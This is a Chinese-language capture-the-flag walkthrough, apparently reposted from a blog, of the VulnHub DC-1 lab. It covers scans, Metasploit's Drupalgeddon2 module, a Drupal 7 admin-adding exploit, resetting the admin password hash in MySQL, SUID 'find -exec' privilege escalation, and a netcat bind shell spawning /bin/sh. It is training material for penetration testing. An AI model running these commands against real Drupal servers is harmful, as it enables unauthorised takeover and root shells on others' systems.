DC1

靶机地址：https://www.vulnhub.com/entry/dc-1,292/

攻击者ip：192.168.56.108 桥接(自动) vmare受害者ip ：192.168.56.111 仅主机 vmbox

参考：https://zhuanlan.zhihu.com/p/135342104

https://blog.csdn.net/weixin_45451139/article/details/113095195

https://www.cnblogs.com/kbhome/p/13296397.html

https://blog.csdn.net/weixin_40416851/article/details/127735618

主机发现

arp-scan -l

nmap -sP 192.168.56.0/24

扫描端口

nmap -p- 192.168.56.111

nmap -p22,80,111,39404 -sV 192.168.56.111

111端口rpcbind漏洞

该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB)，除非进程崩溃，或者管理员挂起/重启rpcbind服务，否则该内存不会被释放。

漏洞利用&补丁：https://github.com/guidovranken/rpcbomb

metasploit模块探测

msfconsole            use auxiliary/scanner/misc/sunrpc_portmapper            //发现端口信息的一个模块            show options            set rhosts 192.168.1.106            show info            //查看模块信息            run            .....            searchsploit rpcbind            

nmap探测

nmap -p 111 --script=rpcinfo 192.168.56.111

访问web页面

没找到sql注入，弱口令，(有次数限制）但是有框架漏洞，drupal

Metersploit，启动

msfconsole启动            search drupal查找drupal框架相关的模块            

用2018的测试

use 1或者use exploit/unix/webapp/drupal_drupalgeddon2使用对应模块            show options查看需要设置的信息            set RHOST 192.168.56.111 受害者ip            set LHOST 192.168.56.108 攻击者ip            run/exploit攻击            

找到flag1.txt，权限低并且不是交互的shell，所以我们要进入交互式的shell

Every good CMS needs a config file - and so do you. 每个好的CMS都需要一个配置文件——您也一样。

根据flag1.txt提示

在settings.php找到flag2，和mysql的账密

dbuser/R0ck3t

Brute force and dictionary attacks aren't the

·only ways to gain access (and you WILL need access).

·What can you do with these credentials?暴力和字典攻击不是*获得访问权限的唯一方法(您将需要访问权限)。*您可以用这些凭证做什么？

输入shell命令，反弹shell，进入mysql

python -c 'import pty; pty.spawn("/bin/bash")'

mysql查询

show database;            use drupaldb;            show tables;            select * from users;            select name,pass from users;            

1.找flag3

发现admin账号和经过加密的密码，drupal常用密码加密是MD5格式，但是7.0以后因为安全性问题将加密方式改成了hash加密（由于很多在线MD5爆破和MD5数据库，可以查到很多MD5码的原文，所以Drupal 7已不再采用Drupal 6和5简单的MD5加密，而是采用一种新型的Hash加密方法。新型加密方法是“加了盐（Salt）”的MD5码，简单理解就是并不会直接将password进行MD5加密，而会和用户名或其它随机字符串组合在一起后再MD5加密。）。

在官方文档找到改密码的方法，https://drupalchina.cn/node/2128

改admin的密码，admin/admin

exit            cd /var/www            ./scripts/password-hash.sh admin            password: adminhash: $S$D9.4RYOGpL0RQ8DHp5EK/qUFspREo388yrJSPpbqfAsS.ocDJtcu            mysql -u dbuser -p            Enter password: R0ck3t            use drupaldb;            update user set pass='$S$D9.4RYOGpL0RQ8DHp5EK/qUFspREo388yrJSPpbqfAsS.ocDJtcu' where name='admin';            

访问web页面，admin/admin，找到falg3

特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。

1.找flag3

查看版本

cat /var/www/includes/bootstrap.inc | grep VERSION

7.24

searchsploit drupal 可以看到历史版本的漏洞

利用drupal7.0版本漏洞增加有admin权限的用户

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.111 -u xxs -p xxs666

xxs/xxs666

home找到flag4find / -name "flag4“cd /home/flag4cat flag4.txt

1.find提权

flag3提示，提权并提示 -exec，想到suid提权 find 命令

使用命令查看 suid 权限的可执行二进制程序

find /root            find命令是用来在指定目录下查找文件。任何位于参数之前的字符串都将被视为欲查找的目录名。如果使用该命令时，不设置任何参数，则find命令将在当前目录下查找子目录与文件，并将查找到的子目录和文件全部进行显示。            find(选项)(参数)            -exec<执行指令>：假设find指令的回传值为True，就执行该指令            -perm<权限数值>：查找符合指定的权限数值的文件或目录            

find / -perm -4000 2>/dev/null            find flag4.txt -exec "whoami" ;            find / -name flag4.txt -exec "/bin/sh" ;            cat /root/thefinalflag.txt            

1.netcat提权

touch xxs            find xxs -exec whoami ;            find xxs -exec netcat -lvp 1111 -e "/bin/sh" ;            kali终端：netcat 192.168.56.111 1111受害者ip            

原文始发于微信公众号（王之暴龙战神）：DC1